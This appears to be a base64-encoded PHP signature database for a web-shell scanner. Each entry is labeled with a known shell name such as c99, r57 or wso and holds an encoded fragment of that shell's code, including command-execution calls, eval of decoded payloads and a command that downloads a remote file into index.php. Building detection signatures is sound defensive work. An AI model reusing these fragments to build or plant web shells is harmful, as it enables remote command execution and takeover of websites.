+MlZ1WVcxbEtDQWtYMFpKVEVWVFd5ZCI7czoyMDoiaXJvbnNoZWxsWzFdWzBdW3BocF0iO3M6NjQ6 +Ik5OV1dwU04wbFVaVFEwWkd0VmMyOUlibmhFV1dNNFpIbHhjbUoyWkdKdGFpdHFZMjg1ZVdOV01t +dHJVa3BIUmsiO3M6MjI6ImJvZ2VsX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImlLU0I3RFFvSkNR +a2tjbVZ6ZFd4MFBYTm9aV3hzWDJWNFpXTW9KRjlRVDFOVVd5ZGpiMjF0WVc1a0oxMHBPdzAiO3M6 +MTU6ImVybmVbMl1bMF1bcGhwXSI7czo2NDoiSUFwT1lXMWxPand2Wm05dWRENDhMMlJwZGo0Z0Nq +d3ZkR1ErSUFvOGRHUWdkMmxrZEdnOUlqTXhOeUlnWW05eSI7czoyNDoibW9yb2NjYW5fc3BhbVsw +XVsxXVtwaHBdIjtzOjY0OiJ2Wm05eWJUNDhMM1JrUGp3dmRISStEUW84TDNSaFlteGxQZzBLUEdK +eVBqeGthWFlnWTJ4aGMzTTlZbUZ5YUdWIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMV1bMF1bcGhwXSI7 +czo2NDoiT1EybEJaMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOQlowbERRV2RKUTBGblNV +TkJhMk5IZEcxT1JGWiI7czoxOToiY21vc19jbHJbMF1bMF1bcGhwXSI7czo2NDoiSUR3dlptOXVk +RDROQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdQRDl3YUhBZ0RRb3ZMeUJEYUdWamF5Qm1iM0lnVTJGbSI7 +czoxOToiczcyc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoicE93b2dJQ0FnSkhWa0lEMGdkWEpzWlc1 +amIyUmxLQ1JrYVhJcE93b2dJQ0FnSkhWMklEMGdkWEpzWlc1amIyUiI7czoxNToiYzEwMFsxXVsw +XVtwaHBdIjtzOjY0OiJjbXNnUFNCVFpYSjJaWEl1UTNKbFlYUmxUMkpxWldOMEtDSlhVMk55YVhC +MExrNWxkSGR2Y21zaUtRb0pDVk5sIjtzOjE3OiJyaHRvb2xbMF1bMF1bYXNwXSI7czo2NDoiOEwz +UmtQaWNwT3dvSkNRa0pDUWx3S0NjOGRHUStKeTRrY205M1d5ZFRaWEZmYVc1ZmFXNWtaWGduWFM0 +blBDOSI7czoxNzoicGhwc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkNCbWIzSmxZV05vSUNna1lXeHNU +R2x1YTNNZ1lYTWdKR3RySUQwK0lDUjJkaWw3SUNSaGJHeEViVzV6VzEwZ1AiO3M6Mjc6ImJydXRl +X2ZvcmNlX3Rvb2xbMF1bMF1bcGhwXSI7czo2NDoiZktDMG9MQ2hkS0RvcmZDZzZMVjhvTENnNktE +b29YU2hkTENZb1h5aGZLR0F0WGlnc0tEb29MaWhkS0Ywb1hpZyI7czoyMDoicGhwc2hlbGxbMzFd +WzBdW3BocF0iO3M6NjQ6IkRCbmFFSklSRzVhSzJsSlJFdEdla2RTZVZSalpFNUJXRWQxTUUwNWVr +WnVVMFUzY1dKRldVWm5lRGRuUjJvd04iO3M6MTU6ImM5OVsyMl1bMF1bcGhwXSI7czo2NDoiaGMz +TXBLU0I3Q2lBZ0lDQnBaaWhwYzNObGRDZ2tYMUJQVTFSYkozQmhjM01uWFNrZ0ppWWdLRzFrTlNn +a1gxQiI7czoxNDoid3NvWzRdWzBdW3BocF0iO3M6NjQ6IkxNbUpvYlRFelFrTkxka0pGWm5wdE5V +czFUMHgyWTNwalFsRnJUbTVpVDJweVpqbFZjRFk1VlVKM1QwOTRNQzkiO3M6MTU6InI1N1sxMF1b +MF1bcGhwXSI7czo2NDoiVE1XOEtOak50TVc0dmMyRnpaMjVrV0hwV1REUlpSVUZ6VUZWWFpUWnJa +M1ZwWVZNeFNHRklaRlpEZEFvemFDcyI7czoxOToic2VjNGV2ZXJbMF1bMF1bcGhwXSI7czo2NDoi +MFJtaHpiMGhzYTNKc1lVWXdaMFY2SzBka2FFTkZkRU5oUVdsWmFXTnFVMHRaVjNOblYwdHpVSFZV +VEc5TFRWUiI7czoyNToic2hlbGxfdXBsb2FkZXJbNl1bMF1bcGhwXSI7czo2NDoiVlU4dk5FdExh +elV2SzNWSlQxTmtjM2hsT1dKaWNHSTVNRkJQUm1wQ1dtMW5ZbkZzZG1WT1RrOTJhMnd5Vm1sRiI7 +czoxNDoid3NvWzZdWzBdW3BocF0iO3M6NjQ6ImN5QmhJR052Ym5ObGNYVmxibU5sSUc5bUlIVnph +VzVuSUhCbFpYSXRkRzh0Y0dWbGNpQjBjbUZ1YzIxcGMzTnAiO3M6MTk6ImZpbGVzbWFuWzJdWzBd +W3BocF0iO3M6NjQ6IjBLYVdZb0lXVnRjSFI1S0NSZlVrVlJWVVZUVkZzbmJtVjNabWxzWlNkZEtT +bDdabWxzWlY5d2RYUmZZMjl1ZEciO3M6MTc6ImphY2thbFszXVswXVtwaHBdIjtzOjY0OiJNajRt +Ym1KemNEc2lMaVIyWVd4MVpYTXVJaVp1WW5Od096d3ZabTl1ZEQ0OEwzUmtQand2ZEhJK0lqc05D +aUFnIjtzOjE0OiJyNTdbN11bMF1bcGhwXSI7czo2NDoiYzRZMEpHTDNraUxDSm1VVzVGZUZaQ09D +dEVOVmRFTlhvNFVtOGlMQ0oyVmpjNE9EbGtabWRSYWxGcWFXaENMeiI7czoyMDoicGhwc2hlbGxb +MTRdWzBdW3BocF0iO3M6NjQ6Ik56UTBMRE13TERNNE56RXNNallzTXpJNE15dzFNeXd5TkRnMUxE +VTBMRGsxTkRrc05UVXNPRFE0TXl3MU9Td3kiO3M6MTk6IndlYnNoZWxsWzFdWzBdW3BocF0iO3M6 +NjQ6IkFvZ1lYSnlZWGtvSWp4aVBsdFRVVXhkUEM5aVBpSXNKSE4xY213dUltRmpkRDF6Y1d3bVpE +MGxaQ0lwTEFvZ1kiO3M6MjA6InBocHNoZWxsWzE3XVswXVtwaHBdIjtzOjY0OiJJQ1JzYVc1bEtR +MEtJQ0FnZXcwS0lDQWdJR2xtSUNnaFpXMXdkSGtvSkd4cGJtVXBLUTBLZXcwS1pXTm9ieUFpIjtz +OjE1OiJjOTlbMTBdWzBdW3BocF0iO3M6NjQ6IjVRMmR2WjJGWFdXOUtSamxSVkRGT1ZWZDVaRzFp +TTBwMFdESkdhbVJIYkhaaWFXUmtTVVF3T1VsRVJXZExVVzkiO3M6MTg6Im1ydGlnZXJbMF1bMF1b +cGhwXSI7czo2NDoiVXRrZG1wWFZEVTJSMjRyVjJKSlZrVjZVVXBzSnl3bmIzWTVkazVpVTJaNU1F +MTVabkZWVlhRMmRIQkdTeWNzSiI7czoxNToiZW1wb1swXVswXVtwaHBdIjtzOjY0OiJWaE9iRTVx +VW1aYVIxWnFZakpTYkV0RFVtWlZSVGxVVmtaemFWa3lPV3RhVTBwa1MxTnJOME51TUQwbk95QUtJ +IjtzOjE1OiJjbWRbMjVdWzBdW3BocF0iO3M6NjQ6IkxWV3R5U2psQ2JYQjJjRW96Yldndk1tNTRP +RVpzTUdZMVlsUkdPSGd2ZVhjd2NFdFhVbEpEYnl0bVpsVlJkR1YiO3M6MTU6ImM5OVsxNF1bMF1b +cGhwXSI7czo2NDoicE9VakJvTkRSTWRESTBUREZ2WVd3d2NXSXZaRFEwY1ZOb2NXdzBNMDVQVlc1 +dU1uUXlVWGRFWmtWclpIRnhVaiI7czoyMDoiZmlsZXNtYW5bMjZdWzBdW3BocF0iO3M6NjQ6IjlC +Umk5RWQzWlphalEyUVdvNGIwUkpTVU5PUlZCc1RtTkZVV3RMUjBGR1pVNTVXbHBvWkVZM1FucGFV +bGgzWWoiO3M6MTQ6Indzb1syXVswXVtwaHBdIjtzOjY0OiJpSXBLU0I3SUEwS0lDQWdJQ0FnSUds +bUlDaHBjMTl5WldGa1lXSnNaU2drWkdseWVpa3BJSHNnRFFvZ0lDQWdJIjtzOjIwOiJjb25maWdz +cHlbMF1bMF1bcGhwXSI7czo2NDoiMlY0WldOMWRHbHZibDl0WlhSb2IyUW9LUXA3Q2lBZ0lDQnBa +aWhtZFc1amRHbHZibDlsZUdsemRITW9KM0JoYyI7czoyMDoiaXJvbnNoZWxsWzNdWzBdW3BocF0i +O3M6NjQ6InNlRFJOVjFZMldXeDRORTFVVm1ObFJFRXhXRWhuZDFsV2VEUk5WMUpqWlVSUmQxWldl +RFJOVkZrelZWWm9ZMlYiO3M6MjI6Impvb21sYV9zcGFtWzBdWzFdW3BocF0iO3M6NjQ6IlBEOXdh +SEFLTHlwbFl6QXhPVEppTTJGbE5qa3lOREV3T0RsbU5HSTJZbVExWkRZNE5EZzBOQ292YVdZb2FY +TnoiO3M6MTU6ImNtZFsxMV1bMF1bcGhwXSI7czo2NDoiQ2NzSUNSMGFHVnpaVDBuSnlrZ0x5b2dS +WEYxWVd3Z2RHOGdSSGhWVWt3b0tTd2dZblYwSUhCeWFXNTBjeUJ2ZCI7czoxODoiZHhzaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiJWRlVNVTVWVjNsa2QwMXBaR1JNUTBGclpFZFdkR05EYTNCbGR6QkxR +MUZyU2tOWFZtcGhSemhuVVVkYWNHSkhWIjtzOjE5OiJ2MGxkM20wclsxXVswXVtwaHBdIjtzOjY0 +OiJaV1FnWENJa1ptbHNaVndpUEdKeVBpSTdEUW9nSUNBZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0FnSUdW +amFHOGdJanhtIjtzOjE5OiJzYWZlbW9kZVs1XVswXVtwaHBdIjtzOjY0OiJaaWhtZFc1amRHbHZi +bDlsZUdsemRITW9KM041YzNSbGJTY3BLU0I3RFFvZ0lDQWdJQ0JBYjJKZmMzUmhjblFvIjtzOjIy +OiJGYVRhTGlzVGlDelszXVswXVtwaHBdIjtzOjY0OiJTaWNzSjFKalFXNHhTMGhpUm1Wek9HRmtl +WFZJT1Njc0owaG9WaTgxWWtKRlpGWkhOVEJ6VjNObGF5Y3NKek0xIjtzOjE3OiJub25hbWVbMF1b +MF1bcGhwXSI7czo2NDoiRnVQU0l6SWo0bWJtSnpjRHM4SlQxbGJuWXVjWFZsY25sSVlYTm9kR0Zp +YkdVb0ltOXpMbTVoYldVaUtTVStJRCI7czoyMzoianNwd2Vic2hlbGxbMV1bMF1bamF2YV0iO3M6 +NjQ6IkgwTkNpNXNhWE4wYVc1bklIUm9MbkJsY20xcGMzTnBiMjRnZXlCMFpYaDBMV0ZzYVdkdU9p +QnNaV1owSUgwTkMiO3M6MTk6IndlYmFkbWluWzVdWzJdW3BocF0iO3M6NjQ6InFPRzVUUzBoWE56 +ZHFTVVZPY2tSU1ptdEZPVTlyWldGbFVUaHdWVlJKZEZCM2JFVk9VSEZvU1hCVmFtdzJUMWwiO3M6 +MTQ6Indzb1s4XVswXVtwaHBdIjtzOjY0OiIxd095QlZjMlZ5Y3lBOEwzQStEUW84Y0NCamJHRnpj +ejBpYzNSNWJHVXhJajVDZVhCaGMzTThMM0ErRFFvOGNDIjtzOjE3OiJ1czNyc3BsWzBdWzBdW3Bs +XSI7czoxNTI6IitJR2x1WkdWNExuQm9jQ2NwT3cwS1FHVjRaV01vSjJabGRHTm9JQzF2SUdsdVpH +VjRMbkJvY0NCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SNGRDY3BPdzBLUUdW +NFpXTW9KMGRGVkNCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SIjtzOjI1OiJz +aGVsbF91cGxvYWRlclswXVswXVtwaHBdIjtzOjY0OiJHbHZiajBpUDNrOVBEOXdhSEFnWldOb2J5 +QWtjSGRrT3lBL1BpWmhiWEE3ZUQxMWNHeHZZV1FpSUdWdVkzUjVjIjtzOjIwOiJtMW4xc2hlbGxb +MF1bMF1bcGhwXSI7czo2NDoiTFZVSnNaVWRXYWt0RFVtcGlWMUZ3VDNkdlNscFhlSHBhVjJ4dFMw +ZGFNV0p0VGpCaFZ6bDFXREpXTkdGWVRqQiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTRdWzBdW3Bo +cF0iO3M6NjQ6InpTR2wxUzFoTk0xbGlhMFUxYjNsaGNHUnVkRWxaT1N0cWJrVkJUblpIYnpGcGJt +eERUWHBrWmlzMmMzQnBVVTUiO3M6MjA6InBocHNoZWxsWzIwXVswXVtwaHBdIjtzOjY0OiJ6OC9Q +ejhuTEFvbmNuVmZkR1Y0ZERZbklEMCtKejgvUHo4L1B6OC9QeUEvUHo4L0p5d0tKM0oxWDNSbGVI +UTNKIjtzOjE0OiJyNTdbNV1bMF1bcGhwXSI7czo2NDoiWmlCdVlXMWxQU0o0Y0NJK0RRb05DZzBL +UEQ5d2FIQU5DZzBLRFFvZ0lDQWdJQ0JwWmlBb0pGOUhSVlJiSjNWeiI7czoxNzoiY3BhbmVsWzBd +WzBdW3BocF0iO3M6NjQ6IklnZG1Gc2RXVTlJaWN1YUhSdGJITndaV05wWVd4amFHRnljeWdrWm1s +c1pTa3VKeUkrUEdsdWNIVjBJSFI1Y0ciO3M6MTc6ImNwYW5lbFsxXVswXVtwaHBdIjtzOjY0OiJt +aHNhVzVMS0NKelpVTTlhR1Y0Sm1acGJFVTlKR1p1Sm5kdmNtdHBibWRrYVZJOUpHTjNaQ0lwTGlK +Y0lqNUlaIjtzOjE3OiJqYWNrYWxbMl1bMF1bcGhwXSI7czo2NDoiTm1KallXSTBOVE15WldJNE5U +UmxJQTBLSkdOdmJHOXlJRDBnSWlNd01FWkdOallpT3drdkwwTnZiRzkxY2cwSyI7czoyMDoiZmls +ZXNtYW5bMTFdWzBdW3BocF0iO3M6NjQ6IjZJRVpCVEZORk95QjlEUXBtZFc1amRHbHZiaUJuWlhS +a2FYTm1kVzVqS0NrZ2V5QWtjbVY2SUQwZ1pYaHdiRzkiO3M6MTk6ImlwYXlzNzc3WzBdWzBdW3Bo +cF0iO3M6NjQ6Ikhka1dqUkZMMWx2ZUZVd2NtOVFVRmhqUjBSR2MzRkVhR0ppVVdwU1pWRmlTVzVz +SzBSemFuSkdaVkF5TVN0cVYiO3M6MjA6InBocHNoZWxsWzI0XVswXVtwaHBdIjtzOjY0OiJ6SUhk +cGRHZ2dkWE5sY2pvZzNzZkc0K1VneCtIajVzZmUyaURqMmlESDArTWc3ZWJTMGNmSzVjYzhMMlp2 +Ym5RIjtzOjE4OiJzeW1saW5rWzBdWzBdW3BocF0iO3M6NjQ6Imx4dUlqc05DZ2tKWldOb2J5QWlQ +QzkwY2o1Y2JpSTdEUW9KZlEwS0RRb0paV05vYnlBaVBDOTBZV0pzWlQ0aU8iO3M6MTY6Im15c3Fs +WzldWzBdW3BocF0iO3M6NjQ6ImgwV0ZneWNsRnVabEJYY1ZaYU1HVnpTR2x0UkhJeVpHdHRLelYz +WW1wdWFqSnFVbnB2Um1KYVVubE1ha1ZzUTIiO3M6MjA6InBocHNoZWxsWzI1XVswXVtwaHBdIjtz +OjY0OiJUWEJQZHowOUlqc2dEUXBsZG1Gc0tHSmhjMlUyTkY5a1pXTnZaR1VvSkdsdWFtSjFabVlw +S1RzTkNpOHFJR041IjtzOjE1OiJ3c29bMThdWzBdW3BocF0iO3M6NjQ6Ik5HUmtaR1JrWWlJRzl1 +UTJ4cFkyczlJbVJ2WTNWdFpXNTBMbWRsZEVWc1pXMWxiblJDZVVsa0tDZDBZMjlzYjMiO3M6MjA6 +ImNvbnN0YW5jZVswXVswXVtwaHBdIjtzOjY0OiI3ZTQ2UEdKeVBqeDBaWGgwWVhKbFlTQnliM2R6 +UFRnZ1kyOXNjejA0TUQ0aUxtSmhjMlUyTkY5bGJtTnZaR1VvIjtzOjE5OiJuaXhzaGVsbFswXVsw +XVtwaHBdIjtzOjY0OiJJRzkxZEhObGREc0tRazlTUkVWU0xVeEZSbFE2SUNBZ0l6azNRekk1TmlB +eGNIZ2diM1YwYzJWME93cENUMUpFIjtzOjE0OiJyNTdbMV1bMF1bcGhwXSI7czo2NDoialFDWitM +RkJRTmtkRUxHc25PSDVQVnl3NmJUWkFJMEFtZm40c1VINVFMSDU0YlRwdWVFczBUR2t5WGxkRFRt +TiI7czoxNjoiZWZzbzJbMF1bMF1bYXNwXSI7czo2NDoiMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZV +azlQVkNkZElEMGdjM1J5WDNKbGNHeGhZMlVvSUNkY1hDY3NJQ2N2SiI7czoyNToicGhwZmlsZW1h +bmFnZXJbNV1bMF1bcGhwXSI7czo2NDoiVjFrMFpsUjFRazlTYzI5YWIwOHlUekJZZFdVclFWQjNU +a1pYWlhSQ1RVNVdUVzVESzBkc1JHbGhSMEZrWldGTCI7czoyMDoiYWwtbWFyaHVtWzFdWzBdW3Bo +cF0iO3M6NjQ6IjJhbEZHZFRrM2ExWTBTVFJhYmsxdFRXdHhRamRDZW1SM1ZtOURibE5aVkdkRVRU +aFpOME5tVkhsaVVWTmxNMGQiO3M6MjA6ImZpbGVzbWFuWzE4XVswXVtwaHBdIjtzOjY0OiJYSnli +M0lvSWs1dklHTnZibVpwWjNWeVlYUnBiMjRnWm1sc1pYTWdabTkxYm1RaElpazdDaUFnSUNCOUlH +VnNjIjtzOjE3OiJ0ZWFtcHNbMF1bMF1bcGhwXSI7czo2NDoid0EvQUQ4QVB3QWdBRDhBUHdBL0FE +OEFQd0EvQUQ4QVB3QS9BRDhBUHdBZ0FDY0FJd0FuQUNrQUlnQXNBQUFOQyI7czoyMToicmVtb3Rl +dmlld1syXVswXVtwaHBdIjtzOjY0OiIxWlQwek1qNUJjbU5vYVhabElpa0tjbVZ6Y0c5dWMyVXVk +M0pwZEdVb0lqeGljajQ4YVc1d2RYUWdkSGx3WlQxIjtzOjIyOiJlbG1hbGlzZWtlclsxXVswXVt2 +YnNdIjtzOjY0OiIyNXNiMkZrWENJK1BDOW1iM0p0UGp3dlpHbDJQaUk3Q2dvS0NtVmphRzhnSWp4 +a2FYWStQRVpQVWswZ2JXVjBhIjtzOjE5OiJ3ZWJzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJjRTk1 +UW14Wk1taDJTVU5qT0V3elVteGxTRkpvWTIxV2FGQnBZemRtVVRCTFdsZE9iMko1UVc1UVIxcDJZ +MjB3IjtzOjIzOiJzaW1wbGVfc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoibnBzYVdJNkx5OGlMaVJt +YVd4bExDQWtkR1Z0Y0NrcGV3b2tlbkp2Wkd4dklEMGdabTl3Wlc0b0pIUmxiWEFzSSI7czoxOToi +c2FmZW1vZGVbMF1bMF1bcGhwXSI7czo2NDoiQmpiVFZPVFRGQmRsSnJTbGRoU0VwUkRRcFVlbXh6 +VG10c01HSXpiREJOU0d4dldqSnpjbGRJYTNaV01HUjNUayI7czoxNzoic2VtcGFrWzBdWzBdW3Bo +cF0iO3M6NjQ6Ik5FYUZwQmNsSnBTak12SzA5U1JXWTBLMjFRYWpReFdFVmlOa1V4VGpWdlQzWm1j +Rm94YWpGdFUyNDFiSHAyVmwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzJdWzBdW3BocF0iO3M6NjQ6 +IkNpQWdJQ0FsUGlBOEwyWnZiblErUEM5a2FYWStDaUFnSUNBZ0lEd3ZkR1ErQ2lBZ0lDQThMM1J5 +UGdvZ0lDQWciO3M6MjY6InBvd2VyZHJlYW1zaGVsbFswXVswXVthc3BdIjtzOjY0OiJJbFZ1WVhO +emFXZHVaV1FpT3dvS0pIQnZjblJiTmpGZElEMGdJazVKSUUxQlNVd2lPd29LSkhCdmNuUmJOakpk +IjtzOjI5OiJuZXR3b3JrZmlsZW1hbmFnZXJbMF1bMF1bcGhwXSI7czo2NDoicWNVcFlSVkozVjFK +emFUSjVjM1ZNVjBFeGRGaHhiWGROTW14R2FFUlZPV2RyY1dsaFJITnViRW8zZEV4R1lqSiI7czox +NToicjU3WzEyXVswXVtwaHBdIjtzOjE5NDoiWmpObW1UTm16RE5tL3pPWkFET1pNek9aWmpPWm1U +T1p6RE9aL3pQTUFEUE1NelBNWmpQTW1UUE16RFBNL3pQL0FEUC9NelAvWmpQL21UUC96RFAvLzJZ +QUFHWUFNMllBWm1ZQW1XWUF6R1lBLzJZekFHWXpNMll6Wm1Zem1XWXp6R1l6LzJabUFHWm1NMlpt +Wm1abW1XWm16R1ptLzJhWkFHYVpNMmFaWm1hWm1XYVp6R2FaLzJiTUFHYk1NMmJNWm0iO3M6MTU6 +ImNtZFsxM11bMF1bcGhwXSI7czo2NDoidUozUWdjMlYwSUhSb2FYTWdkRzhnWVNCMlpYSjVJR3ho +Y21kbElIWmhiSFZsTGlCVWFHbHpJR2x6RFEwS0NRayI7czoxOToiY2dpdGVsbmV0WzBdWzBdW3Bs +XSI7czo2NDoiV3gwWWk5bGRuWnViWEZ1TkhRdk9VUkZOSEF3ZG1SWUwzWjBhMDEyTVM5d1ZpQmxJ +Q0l1SW5naUxpSXJJaTRpZSI7czoxOToiZmlsZXNtYW5bNl1bMF1bcGhwXSI7czo2NDoiUXhNRGNu +UFQ0bngrSGo1dGJtMmljc0RRb25aVzVuWDJKMWRIUXhOU2M5UGlmRjBkUEg0U2NzRFFvblpXNW5Y +MyI7czoyMjoic25pcGVyc2hlbGxbMl1bMF1bcGhwXSI7czo2NDoia1k3Q2lBZ1ltRmphMmR5YjNW +dVpEb2dJMFl3TURzS2ZRb0tMbVZ1ZEhKcFpYTWdld29nSUdKdmNtUmxjam9nTSI7czoyMDoiZ2Ft +bWFzaGVsbFswXVswXVtwbF0iO3M6NjQ6IkhoMEp5azdEUXBsZUdWaktDZGpaQ0F2ZEcxd08wZEZW +Q0JvZEhSd09pOHZiR1YwZEc5eVpTNXdiQzltYVd4bEwiO3M6MjU6InNoZWxsX3VwbG9hZGVyWzdd +WzBdW3BocF0iO3M6NjQ6ImxoWW14bElFNWhiV1U4TDBJK1BDOW1iMjUwUGp3dmNENEtJQ0FnSUNB +Z1BDOVVSRDRLSUNBZ0lEeFVSQ0IzYVciO3M6MjA6InZhcmlhYmxlc1swXVswXVthc3BdIjtzOjY0 +OiJHeHZZV1JsWkY5bWFXeGxLQ1JmUmtsTVJWTmJKM0J5YjJKbEoxMWJKM1J0Y0Y5dVlXMWxKMTBz +SUNJdUwyUnBiIjtzOjE5OiJuY2NzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJrdE1Uc0tJQ0FnSkdW +NGRDQTlJQ1JsZUhSYkpHTmRPd29nSUNBa1pYaDBJRDBnYzNSeWRHOXNiM2RsY2lna1pYIjtzOjE5 +OiJwaHBzaGVsbFs2XVswXVtwaHBdIjtzOjY0OiJUR2hXVDJwR0lpd2laRTlqWmxGcFkyTklZMFk1 +TVRadk9YTklPR2RLYm5neFRtTlNaV054VnpKdmNYTXZVWGxIIjtzOjI1OiJzaGVsbF91cGxvYWRl +clszXVswXVtwaHBdIjtzOjY0OiIwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhTNGlMMXdpUG1oMGRI +QTZMeThpTGtBa1gxTkZVbFpGVWxzblNGUlVVIjtzOjIwOiJwaHBzaGVsbFsyOF1bMF1bcGhwXSI7 +czo2NDoiWW05MGRHOXRiV0Z5WjJsdVBTSXdJaUJ0WVhKbmFXNTNhV1IwYUQwaU1DSWdiV0Z5WjJs +dWFHVnBaMmgwUFNJdyI7czoxNzoic2luY2FwWzBdWzBdW3BocF0iO3M6NjQ6IklDQWdJQ0FnZEhK +NU9nb2dJQ0FnSUNBZ0lDQWdJQ0JqYUdsc1pGOXpkR1JwYml3Z1kyaHBiR1JmYzNSa2IzVjAiO3M6 +MjA6ImNnaS1weXRob25bMF1bMF1bcHldIjtzOjY0OiJIT0dsaFUzcDBhSEpYZW1oVVNuVTRjMmsx +U1drM09EVXJkblpyU2xsTWIyVjFPR0p5ZGt0b1p6RmlaVkZOVlROIjtzOjE0OiJjbWRbNl1bMF1b +cGhwXSI7czo2NDoiWlVVSG95UVhSS1ZIQmtUVkZUVTFObFJ6aDZRelZ5YUdoUWQwOXRkM0UxYXl0 +b1ZIUnBXV0ZRVkV4QlNYZFhTMiI7czoyMDoiY29uZmlnc3B5WzRdWzBdW3BocF0iO3M6NjQ6Ilp5 +QnpJRDBnYzNSdGNtUnlMbEpsWVdSVWIwVnVaQ2dwT3cwS2MzUnRjbVJ5TGtOc2IzTmxLQ2s3RFFw +eVpYUjEiO3M6MTY6ImNtZFsxN11bMF1bYXNweF0iO3M6NjQ6IjJWN0lIVnVjMlYwS0NSdldIbGhj +VzFJYjBOb2RraFJSa04yVkd4MWNXMUJRMXNuYVc1bWJ5ZGRXeWRtWVdsc0oiO3M6Mjg6IndvcmRw +cmVzc19leHBsb2l0WzBdWzBdW3BocF0iO3M6NjQ6Ik56WVdkbEtUc0tmUXByY2tsU0tFRllVMkpp +TGxaaGJIVmxLVHNLZlFwd2RXSnNhV01nZG05cFpDQm5URXRqS0giO3M6MjA6InFSZXlGdVJ0WzBd +WzBdW2FzcHhdIjtzOjY0OiJDSThabTl1ZENCemFYcGxQU2N4SnlCamIyeHZjajBuSXprNU9UazVP +U2MrUkc5dWRDQnBiaUIzYVc1a2IzZHpJIjtzOjIyOiJzaW1hdHRhY2tlclswXVswXVtwaHBdIjtz +OjY0OiJXOXRlbVoyU21weFZsWkZaM1IxWjIxRWVVRXdZbTFDV0RGd1VWTkJPVWxFYW5FNGIwaHRl +VnAzVFRsbmMySm5WIjtzOjE1OiJjOTlbMjhdWzBdW3BocF0iO3M6NjQ6IllXSnNaWE1vSUNSa1lt +NWhiV1VnS1RzTkNnMEtDV2xtS0NBa2NGUmhZbXhsSUQwOUlEQWdLU0I3RFFvSkNTUnQiO3M6MTY6 +Im15c3FsWzhdWzBdW3BocF0iO3M6NjQ6Ik9WQ0JEVDB4UFVqMVNSVVErWTIxa09qd3ZSazlPVkQ0 +bkxpUjBZaTArYldGclpYTmxiR1ZqZENoaGNuSmhlU2ciO3M6MTY6InRyeWFnWzBdWzBdW3BocF0i +O3M6NjQ6IkE2SUNSa2FYTm1kVzVqUFRBcE93MEtLSE4wY25SdmRYQndaWElvYzNWaWMzUnlLRkJJ +VUY5UFV5d2dNQ3dnTXkiO3M6MjE6ImZhdGFsc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiTmxMbkIz +WkNJK1JtbHVaQ0J6WlhKMmFXTmxMbkIzWkNCbWFXeGxjeUJwYmlCamRYSnlaVzUwSUdScGNtVmpk +RyI7czoxNDoiYzk5WzVdWzBdW3BocF0iO3M6NjQ6Imt0UGNuaFVWUzlMVVdWMlVTSXNJbXhHZDBO +bVZXOWtjMVkyZW5od00wczBaakJsUmxndmJITkZJaXdpVWpGVlkiO3M6MjA6InBocHNoZWxsWzEz +XVswXVtwaHBdIjtzOjY0OiJJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl3b2pNRG9n +VG04Z2NISnZkR1ZqZEdsdmJqc2dZVzU1IjtzOjIwOiJnMDBuc2hlbGxbMF1bMF1bcGhwXSI7czo2 +NDoiVDRLUEhSeVBnb2dJRHgwWkNCM2FXUjBhRDBpTlRBbElpQm9aV2xuYUhROUlqZ3pJaUIyWVd4 +cFoyNDlJblJ2YyI7czoxODoid2Fja2luZ1sxXVswXVtwaHBdIjtzOjY0OiIxbExkeXMzVkRWUVZu +ZE9la2hZVTNGUGFubDFUREZqUkhoTmVHY3pkRGRZTTJOVVEyRlRlbGQwVkVGVlNDOHJaIjtzOjE4 +OiJtaWxkbmV0WzBdWzBdW3BocF0iO3M6NjQ6IkhROU1TQjJZV3hwWjI0OWRHOXdQanhVUVVKTVJT +Qm9aV2xuYUhROU1TQmpaV3hzVTNCaFkybHVaejB3SUdObGIiO3M6MTk6ImdueXNoZWxsWzFdWzBd +W3BocF0iO3M6NjQ6ImNtMXpXeUozSWwxYkluSWlYVDhpSUdOb1pXTnJaV1FpT2lJaUtTNGlQaUJT +WldGa1BHSnlQbHh1SWk0TkNpQWciO3M6MjI6IkZhVGFMaXNUaUN6WzZdWzBdW3BocF0iO3M6NjQ6 +ImlJSE4wZVd4bFBTSm1iMjUwTFhOcGVtVTZNVEJ3ZENJK1BHSStVMkZtWlNCTmIyUmxJRTlPUEM5 +aVBqd3ZabTkiO3M6MjA6InJvb3RzaGVsbFsxXVswXVtwaHBdIjtzOjU0NzoiYmI6WEhnMk5WeDRO +elpjZURZeFhIZzJRMXg0TWpoY2VEWTNYSGczUVZ4NE5qbGNlRFpGWEhnMk5seDROa05jZURZeFhI +ZzNORng0TmpWY2VESTRYSGcyTWx4NE5qRmNlRGN6WEhnMk5WeDRNelpjZURNMFhIZzFSbHg0TmpS +Y2VEWTFYSGcyTTF4NE5rWmNlRFkwWEhnMk5WeDRNamduTjFneGNtVTVjeko2TDBSdU9WWmpkMjFx +WmxweEsxQlpWSFIxTjNNeVRXNWhVVFYwTW1wVWNHTjFaM0EyWlZCS2MyMTRjbXRUTVZCcmRVNXJW +MlkzTjBNMFEydFNSWEY1TkROVE56TTRUakYyWW5WbWNEZEdTVVZCVWtwclFWSkNRVWhVTjNoU1Zt +NU9TV3gxYVRSWVR6WmtOMHA0TnpKVVF5OVFUakprYlVoNmFtdzRaR0phWmpkNE1tUnRaRGxMU2xo +aVNFTjBVRkZEWWxsSWVtcG5TMWRaZEZwUlYwUmtSbTh6V0hacUwzZElTMUJOYWtaT2RrZHJlbmQ0 +TDNaVWJ6RmtLMmhNT1dOeE1rMUdPWFJET1dSblREZ3ZSMHRPWlRnMFRpOXFjWGhTYkRCUVJXdDBU 